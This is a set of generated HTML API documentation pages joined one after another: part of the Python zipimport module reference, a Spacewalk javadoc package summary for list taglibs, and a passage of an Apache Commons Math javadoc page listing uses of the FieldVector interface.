definition">¶</a></dt> <dd><p>Return <tt class="docutils literal"><span class="pre">True</span></tt> if the module specified by <em>fullname</em> is a package. Raise <a class="reference internal" href="#zipimport.ZipImportError" title="zipimport.ZipImportError"><tt class="xref py py-exc docutils literal"><span class="pre">ZipImportError</span></tt></a> if the module couldn&#8217;t be found.</p> </dd></dl> <dl class="method"> <dt id="zipimport.zipimporter.load_module"> <tt class="descname">load_module</tt><big>(</big><em>fullname</em><big>)</big><a class="headerlink" href="#zipimport.zipimporter.load_module" title="Permalink to this definition">¶</a></dt> <dd><p>Load the module specified by <em>fullname</em>. <em>fullname</em> must be the fully qualified (dotted) module name. It returns the imported module, or raises <a class="reference internal" href="#zipimport.ZipImportError" title="zipimport.ZipImportError"><tt class="xref py py-exc docutils literal"><span class="pre">ZipImportError</span></tt></a> if it wasn&#8217;t found.</p> </dd></dl> <dl class="attribute"> <dt id="zipimport.zipimporter.archive"> <tt class="descname">archive</tt><a class="headerlink" href="#zipimport.zipimporter.archive" title="Permalink to this definition">¶</a></dt> <dd><p>The file name of the importer&#8217;s associated ZIP file, without a possible subpath.</p> </dd></dl> <dl class="attribute"> <dt id="zipimport.zipimporter.prefix"> <tt class="descname">prefix</tt><a class="headerlink" href="#zipimport.zipimporter.prefix" title="Permalink to this definition">¶</a></dt> <dd><p>The subpath within the ZIP file where modules are searched. This is the empty string for zipimporter objects which point to the root of the ZIP file.</p> </dd></dl> <p>The <a class="reference internal" href="#zipimport.zipimporter.archive" title="zipimport.zipimporter.archive"><tt class="xref py py-attr docutils literal"><span class="pre">archive</span></tt></a> and <a class="reference internal" href="#zipimport.zipimporter.prefix" title="zipimport.zipimporter.prefix"><tt class="xref py py-attr docutils literal"><span class="pre">prefix</span></tt></a> attributes, when combined with a slash, equal the original <em>archivepath</em> argument given to the <a class="reference internal" href="#zipimport.zipimporter" title="zipimport.zipimporter"><tt class="xref py py-class docutils literal"><span class="pre">zipimporter</span></tt></a> constructor.</p> </dd></dl> </div> <div class="section" id="examples"> <span id="zipimport-examples"></span><h2>31.4.2. Examples<a class="headerlink" href="#examples" title="Permalink to this headline">¶</a></h2> <p>Here is an example that imports a module from a ZIP archive - note that the <a class="reference internal" href="#module-zipimport" title="zipimport: support for importing Python modules from ZIP archives."><tt class="xref py py-mod docutils literal"><span class="pre">zipimport</span></tt></a> module is not explicitly used.</p> <div class="highlight-python"><div class="highlight"><pre>$ unzip -l example.zip Archive: example.zip Length Date Time Name -------- ---- ---- ---- 8467 11-26-02 22:30 jwzthreading.py -------- ------- 8467 1 file $ ./python Python 2.3 (#1, Aug 1 2003, 19:54:32) &gt;&gt;&gt; import sys &gt;&gt;&gt; sys.path.insert(0, &#39;example.zip&#39;) # Add .zip file to front of path &gt;&gt;&gt; import jwzthreading &gt;&gt;&gt; jwzthreading.__file__ &#39;example.zip/jwzthreading.py&#39; </pre></div> </div> </div> </div> </div> </div> </div> <div class="sphinxsidebar"> <div class="sphinxsidebarwrapper"> <h3><a href="../contents.html">Table Of Contents</a></h3> <ul> <li><a class="reference internal" href="#">31.4. <tt class="docutils literal"><span class="pre">zipimport</span></tt> &#8212; Import modules from Zip archives</a><ul> <li><a class="reference internal" href="#zipimporter-objects">31.4.1. zipimporter Objects</a></li> <li><a class="reference internal" href="#examples">31.4.2. Examples</a></li> </ul> </li> </ul> <h4>Previous topic</h4> <p class="topless"><a href="imputil.html" title="previous chapter">31.3. <tt class="docutils literal"><span class="pre">imputil</span></tt> &#8212; Import utilities</a></p> <h4>Next topic</h4> <p class="topless"><a href="pkgutil.html" title="next chapter">31.5. <tt class="docutils literal"><span class="pre">pkgutil</span></tt> &#8212; Package extension utility</a></p> <h3>This Page</h3> <ul class="this-page-menu"> <li><a href="../bugs.html">Report a Bug</a></li> <li><a href="../sources_/library/zipimport.txt" rel="nofollow">Show Source</a></li> </ul> <div id="searchbox" style="display: none"> <h3>Quick search</h3> <form class="search" action="../search.html" method="get"> <input type="text" name="q" /> <input type="submit" value="Go" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> <p class="searchtip" style="font-size: 90%"> Enter search terms or a module, class or function name. </p> </div> <script type="text/javascript">$('#searchbox').show(0);</script> </div> </div> <div class="clearer"></div> </div> <div class="related"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../genindex.html" title="General Index" >index</a></li> <li class="right" > <a href="../py-modindex.html" title="Python Module Index" >modules</a> |</li> <li class="right" > <a href="pkgutil.html" title="31.5. pkgutil — Package extension utility" >next</a> |</li> <li class="right" > <a href="imputil.html" title="31.3. imputil — Import utilities" >previous</a> |</li> <li><img src="../static_/py.png" alt="" style="vertical-align: middle; margin-top: -1px"/></li> <li><a href="https://www.python.org/">Python</a> &raquo;</li> <li> <span class="version_switcher_placeholder">2.7.11rc1</span> <a href="../index.html">Documentation</a> &raquo; </li> <li><a href="index.html" >The Python Standard Library</a> &raquo;</li> <li><a href="modules.html" >31. Importing Modules</a> &raquo;</li> </ul> </div> <div class="footer"> &copy; <a href="../copyright.html">Copyright</a> 1990-2015, Python Software Foundation. <br /> The Python Software Foundation is a non-profit corporation. <a href="https://www.python.org/psf/donations/">Please donate.</a> <br /> Last updated on Nov 21, 2015. <a href="../bugs.html">Found a bug</a>? <br /> Created using <a href="http://sphinx.pocoo.org/">Sphinx</a> 1.2.3. </div> </body> </html>
documentation/javadoc/com/redhat/rhn/frontend/taglibs/list/package-summary.html
colloquium/spacewalk
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_18) on Tue Nov 02 13:16:54 CET 2010 --> <TITLE> com.redhat.rhn.frontend.taglibs.list </TITLE> <META NAME="date" CONTENT="2010-11-02"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="com.redhat.rhn.frontend.taglibs.list"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Package</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/helpers/package-summary.html"><B>PREV PACKAGE</B></A>&nbsp; &nbsp;<A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/collection/package-summary.html"><B>NEXT PACKAGE</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../index.html?com/redhat/rhn/frontend/taglibs/list/package-summary.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-summary.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <H2> Package com.redhat.rhn.frontend.taglibs.list </H2> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Interface Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/ListFilter.html" title="interface in com.redhat.rhn.frontend.taglibs.list">ListFilter</A></B></TD> <TD>Defines the interface for filtering data in the ListTag</TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Class Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/AlphaBarHelper.html" title="class in com.redhat.rhn.frontend.taglibs.list">AlphaBarHelper</A></B></TD> <TD>AlphaBarHelper</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/BaseListFilter.html" title="class in com.redhat.rhn.frontend.taglibs.list">BaseListFilter</A></B></TD> <TD>BaseListFilter</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/ColumnFilter.html" title="class in com.redhat.rhn.frontend.taglibs.list">ColumnFilter</A></B></TD> <TD>ColumnFilter</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/ColumnTag.html" title="class in com.redhat.rhn.frontend.taglibs.list">ColumnTag</A></B></TD> <TD>Implements one column of a displayed data list</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/CSVTag.html" title="class in com.redhat.rhn.frontend.taglibs.list">CSVTag</A></B></TD> <TD>Exports a List of data to a comma separated value string</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/DataSetManipulator.html" title="class in com.redhat.rhn.frontend.taglibs.list">DataSetManipulator</A></B></TD> <TD>Provides a bunch of helper methods to make working with lists easier from a custom tag POV.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/DecoratorTag.html" title="class in com.redhat.rhn.frontend.taglibs.list">DecoratorTag</A></B></TD> <TD>DecoratorTag</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/ExpandableColumnTag.html" title="class in com.redhat.rhn.frontend.taglibs.list">ExpandableColumnTag</A></B></TD> <TD>List tag construct to render expandable columns ExpandableColumnTag</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/ListFilterHelper.html" title="class in com.redhat.rhn.frontend.taglibs.list">ListFilterHelper</A></B></TD> <TD>ListFilterHelper</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/ListSetTag.html" title="class in com.redhat.rhn.frontend.taglibs.list">ListSetTag</A></B></TD> <TD>Provides a container for the new-style lists</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/ListTag.html" title="class in com.redhat.rhn.frontend.taglibs.list">ListTag</A></B></TD> <TD>Renders a list of data bean in a page</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/ListTagHelper.html" title="class in com.redhat.rhn.frontend.taglibs.list">ListTagHelper</A></B></TD> <TD>Static helper class for the "new-style" list tag</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/ListTagUtil.html" title="class in com.redhat.rhn.frontend.taglibs.list">ListTagUtil</A></B></TD> <TD>Provides various utility functions for the ListTag, ColumnTag, and SpanTag</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/NonExpandableColumnTag.html" title="class in com.redhat.rhn.frontend.taglibs.list">NonExpandableColumnTag</A></B></TD> <TD>List tag construct to render expandable columns NonExpandableColumnTag</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/RadioColumnTag.html" title="class in com.redhat.rhn.frontend.taglibs.list">RadioColumnTag</A></B></TD> <TD>RadioTag Implements a simple radio button collection useful with rl list tag.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/RowRendererTag.html" title="class in com.redhat.rhn.frontend.taglibs.list">RowRendererTag</A></B></TD> <TD>DecoratorTag</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/SelectableColumnTag.html" title="class in com.redhat.rhn.frontend.taglibs.list">SelectableColumnTag</A></B></TD> <TD>Implements a simple selected checkbox like those used with RhnSets</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/SpanTag.html" title="class in com.redhat.rhn.frontend.taglibs.list">SpanTag</A></B></TD> <TD>Renders headers or footers for a list The class name derives from the fact that headers and footers _span_ columsn when they are displayed</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/TagHelper.html" title="class in com.redhat.rhn.frontend.taglibs.list">TagHelper</A></B></TD> <TD>general tag helper for common functionality shared between tags TagHelper</TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Enum Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD WIDTH="15%"><B><A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/ListCommand.html" title="enum in com.redhat.rhn.frontend.taglibs.list">ListCommand</A></B></TD> <TD>Describes the various states the ListTag moves thru as it renders a list</TD> </TR> </TABLE> &nbsp; <P> <DL> </DL> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Package</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/helpers/package-summary.html"><B>PREV PACKAGE</B></A>&nbsp; &nbsp;<A HREF="../../../../../../com/redhat/rhn/frontend/taglibs/list/collection/package-summary.html"><B>NEXT PACKAGE</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../index.html?com/redhat/rhn/frontend/taglibs/list/package-summary.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-summary.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> </BODY> </HTML>
libraries/commons-math3-3.4.1/docs/apidocs/org/apache/commons/math3/linear/class-use/FieldVector.html
as-1/STSP
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html" charset="UTF-8"> <title>Uses of Interface org.apache.commons.math3.linear.FieldVector (Apache Commons Math 3.4.1 API)</title> <link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Interface org.apache.commons.math3.linear.FieldVector (Apache Commons Math 3.4.1 API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage"><em><script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script></em></div> </div> <div class="subNav"> <ul class="navList"> <li>PREV</li> <li>NEXT</li> </ul> <ul class="navList"> <li><a href="../../../../../../index.html?org/apache/commons/math3/linear//class-useFieldVector.html" target="_top">FRAMES</a></li> <li><a href="FieldVector.html" target="_top">NO FRAMES</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Interface org.apache.commons.math3.linear.FieldVector" class="title">Uses of Interface<br>org.apache.commons.math3.linear.FieldVector</h2> </div> <div class="classUseContainer"> <ul class="blockList"> <li class="blockList"> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation"> <caption><span>Packages that use <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Package</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="#org.apache.commons.math3.linear">org.apache.commons.math3.linear</a></td> <td class="colLast"> <div class="block">Linear algebra support.</div> </td> </tr> </tbody> </table> </li> <li class="blockList"> <ul class="blockList"> <li class="blockList"><a name="org.apache.commons.math3.linear"> <!-- --> </a> <h3>Uses of <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a> in <a href="../../../../../../org/apache/commons/math3/linear/package-summary.html">org.apache.commons.math3.linear</a></h3> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing classes, and an explanation"> <caption><span>Classes in <a href="../../../../../../org/apache/commons/math3/linear/package-summary.html">org.apache.commons.math3.linear</a> that implement <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Class and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="class in org.apache.commons.math3.linear">ArrayFieldVector&lt;T extends FieldElement&lt;T&gt;&gt;</a></strong></code> <div class="block">This class implements the <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear"><code>FieldVector</code></a> interface with a <a href="../../../../../../org/apache/commons/math3/FieldElement.html" title="interface in org.apache.commons.math3"><code>FieldElement</code></a> array.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>class&nbsp;</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="class in org.apache.commons.math3.linear">SparseFieldVector&lt;T extends FieldElement&lt;T&gt;&gt;</a></strong></code> <div class="block">This class implements the <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear"><code>FieldVector</code></a> interface with a <a href="../../../../../../org/apache/commons/math3/util/OpenIntToFieldHashMap.html" title="class in org.apache.commons.math3.util"><code>OpenIntToFieldHashMap</code></a> backing store.</div> </td> </tr> </tbody> </table> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation"> <caption><span>Methods in <a href="../../../../../../org/apache/commons/math3/linear/package-summary.html">org.apache.commons.math3.linear</a> that return <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#add(org.apache.commons.math3.linear.FieldVector)">add</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute the sum of <code>this</code> and <code>v</code>.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#add(org.apache.commons.math3.linear.FieldVector)">add</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute the sum of <code>this</code> and <code>v</code>.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#add(org.apache.commons.math3.linear.FieldVector)">add</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute the sum of <code>this</code> and <code>v</code>.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#add(org.apache.commons.math3.linear.SparseFieldVector)">add</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="class in org.apache.commons.math3.linear">SparseFieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Optimized method to add sparse vectors.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#append(org.apache.commons.math3.linear.FieldVector)">append</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Construct a vector by appending a vector to this vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#append(org.apache.commons.math3.linear.FieldVector)">append</a></strong>(<a 